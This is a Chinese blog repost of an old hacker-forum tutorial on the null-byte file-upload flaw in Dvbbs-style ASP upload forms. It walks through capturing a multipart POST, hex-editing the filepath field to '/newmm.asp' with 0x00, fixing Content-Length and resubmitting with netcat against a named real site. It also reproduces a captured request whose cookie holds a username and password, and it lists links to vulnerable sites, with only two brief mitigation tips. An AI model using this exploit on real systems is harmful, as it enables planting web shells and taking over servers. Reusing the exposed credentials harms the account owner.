java抓包asp_asp 之上传漏洞终结篇

asp 之上传漏洞终结篇

更新时间:2007年03月24日 00:00:00   作者:

收藏关于上传漏洞的文章,最近一直遇到这个麻烦,

作者:szjwwwww

出自:黑鹰基地论坛

http://www.3800cc.com

一、写在前面

***这个上传漏洞利用的原理只是针对form格式上传的asp和php脚本***

NC(Netcat)

用于提交 数据包

DOS界面下运行:

NC -vv www.***.com 80<1.txt

-vv: 回显

80:  www端口

1.txt: 就是你要发送的数据包

(更多使用方法请查看本区的帖子)

WSE(WSockExpert)

对本机端口的监视,抓取IE提交的数据包

(不会用的就自己到网上搜资料N多)

二、漏洞原理

下面例子假设的前提

www主机:  www.***.com;

bbs路径 :  /bbs/

漏洞源于对动网上传文件的研究,建议有一定编程经验的

看看Dvbbs的upfile.asp文件,没有必要全部看懂

upfile是通过生成一个form表上传,

用到的变量:

filepath 默认值uploadface 属性hiden

act      默认值upload     属性hiden

file1    就是你要传的那个文件

关键是 filepath 这个变量!

默认情况下我们的文件上传到www.***.com/bbs/uploadface/

文件是用你的上传时间命名的,就是upfile里的这一句

FileName=FormPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&FileExt

-------------------------------------------------------------------------

我们知道计算机里面的数据是一"\0"为标致的用过C语言的都知道

char data[]="bbs"

这个data数组长度是4: b b s \0

如果我们构造filepath如下,会怎么样呢?

filepath="/newmm.asp\0"

我们在2004.09.24.08.24传的文件就会发生变化

没有改时:

http://www.***.com/bbs/uploadface/200409240824.jpg

用我们构造的filepath时:

http://www.***.com/newmm.asp\0/200409240824.jpg

这样当服务器接收filepath数据时,检测到newmm.asp后面的\0

就理解为filepath的数据就结束了

这样我们上传的文件,比如c:\1.asp

就保存成: http://www.***.com/newmm.asp

三、后期补充

漏洞公布以后很多网站做了相应的处理,但是对于filepath的过滤和处理都不行

有很多网站只是加了N个hiden属性的变量对付网上公布的upfile.exe就是那个

上传漏洞利用工具或者filepath变量利用工具(老兵的)...但是最基本的没改啊。。

而且很对网站的插件里有类似的漏洞,我要说的不要依赖哪些专门的工具

自己改WSE抓到的包里的filepath变量,然后在用NC提交。。。

就算他加N个hiden变量也于事无补。

当然,如果对filepath做了很严格的过滤的话我们的这些理论就将宣告终结

就是我们的新理论诞生的时候!

四、漏洞列表

http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5369

http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5530

http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5531

http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5693

http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5731

http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5746

监听外部主机

NC [-options] hostname port[s] [ports] ...

监听本地主机

NC -l -p port [options] [hostname] [port]

options:

-d              detach from console, stealth mode

-e prog         inbound program to exec [dangerous!!]

-g gateway      source-routing hop point[s], up to 8

-G num          source-routing pointer: 4, 8, 12, ...

-h              this cruft

-i secs         delay interval for lines sent, ports scanned

-l              listen mode, for inbound connects

-L              listen harder, re-listen on socket close

-n              numeric-only IP addresses, no DNS

-o file         hex dump of traffic

-p port         local port number

-r              randomize local and remote ports

-s addr         local source address

-t              answer TELNET negotiation

-u              UDP mode

-v              verbose [use twice to be more verbose]

-w secs         timeout for connects and final net reads

-z              zero-I/O mode [used for scanning]

port numbers can be individual  or ranges: m-n [inclusive]

详细实例:

---------------------------------------------------------------------------------

一、WSE抓包结果(存到1.txt里):

POST /bbs/upPhoto/upfile.asp HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Referer: http://www.xin126.com/bbs/upPhoto/upload.asp

Accept-Language: zh-cn

Content-Type: multipart/form-data; boundary=---------------------------7d423a138d0278

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)

Host: www.xin126.com

Content-Length: 1969

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDACCCCDCS=NJHCPHPALBCANKOBECHKJANF; isCome=1; GAMVANCOOKIES=1; regTime=2004%2D9%2D24+3%3A39%3A37; username=szjwwwww; pass=5211314; dl=0; userID=62; ltStyle=0; loginTry=1; userPass=eb03f6c72908fd84

-----------------------------7d423a138d0278

Content-Disposition: form-data; name="filepath"

../medias/myPhoto/

-----------------------------7d423a138d0278

... ...

上传

-----------------------------7d423a138d0278--

---------------------------------------------------------------------------------

二、UltraEdit打开1.txt改数据:

......

-----------------------------7d423a138d0278

Content-Disposition: form-data; name="filepath"

/newmm.asp█                 <===这个黑色代表一个空格是 0x20,改成0x00就可以了

......

三、重新计算cookies长度,然后nc提交

Nc -vv www.xin126.com 80 <1.txt

UltraEdit是一个16位编辑器网上可以下载得到

我们主要用来写那个结束标致: \0 ====>16位表示:0x00或者00H

其实你改的时候就直接再filepath的结尾

处加个00就OK了

计算cookies长度===>你把fillepath改了之后、肯定是或+或—cookies的长度变了

......

Host: www.xin126.com

Content-Length: 1969  <======就是这个

Connection: Keep-Alive

Cache-Control: no-cache

......

计算会吧?一个字母、数字就是1

对于上传漏洞提出的解决思路:(仅供参考)

1、一般的上传是把上传路径作为一个变量来处理

===>我们的对策就是把filepath变成常量。。。

这个方法是目前最有效的(我认为的)

2、加强对于\0的处理,原来我们是读到这里就结束

我们继续读直道下一个变量开始的地方,处理就OK了

相关文章

1a1b05c64693fbf380aa1344a7812747.png

用asp获取内容中的图片与获取内容中的第一个图片地址,主要是cms中保存内容中的图片需要用得到,使用的是正则的方法。2011-01-01

4f55910a645b073bc4fc65dc10dc14bd.png

过滤非法的SQL字符,防止sql注入等。里面的体会思路主要运用了批量替换,是个不错的思路。2010-05-05

0ea3c7666119d5615e582f823fb3fad6.png

由于IIS默认对ASP等动态页面设置的CACHE参数是private,会使得CACHE软件不会缓存ASP输出页面2010-11-11

4f96a78db829b1556ff16de21e013c7a.png

asp输出bmp...2007-03-03

8cc1031babc6aff2319f1c6af8544aa0.png

我作了一个ASP静态站,由于网站改片,所以所有静态页都要更新,原来是以时间命名为文件命,现在全部改成ID命名,但数据库内的保存地址的那个字段无法更新,请各位大虾指点一二,小弟不胜感激...................2008-03-03

0c932a99bb7b6f23c937db507070cc7b.png

运行asp是提示Microsoft OLE DB Provider for ODBC Drivers (0x80004005)[Microsoft][ODBC Microsoft Access Driver] 找不到文件 '(未知的)'。2009-12-12

cca732bf65a93ed2ec0ac80c638460fe.png

PS:KJ大牛写的文章,昨天跟一朋友聊天的时候提到了ADO的command查询,我竟然把这个东西给忘记了,看来记性真的是太差了,找到了kj大牛的文章,拜读一下。2008-12-12

2d9f31f2af7b675a3d153d2b7f1035a7.png

下面,我们会来编写一个非常简单的组件,重点是知道怎样开发DLL组件,而不是其复杂的代码!这些都要靠你们自己以后的努力了2012-08-08

b452cee8ec5cd9e58ab98eba17281e59.png

asp:生成静态页面函数...2006-08-08

f4838ec7e2d4da28e0b57d4e852dadd4.png

使用asp代码突破图片的防盗连...2007-01-01

最新评论

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值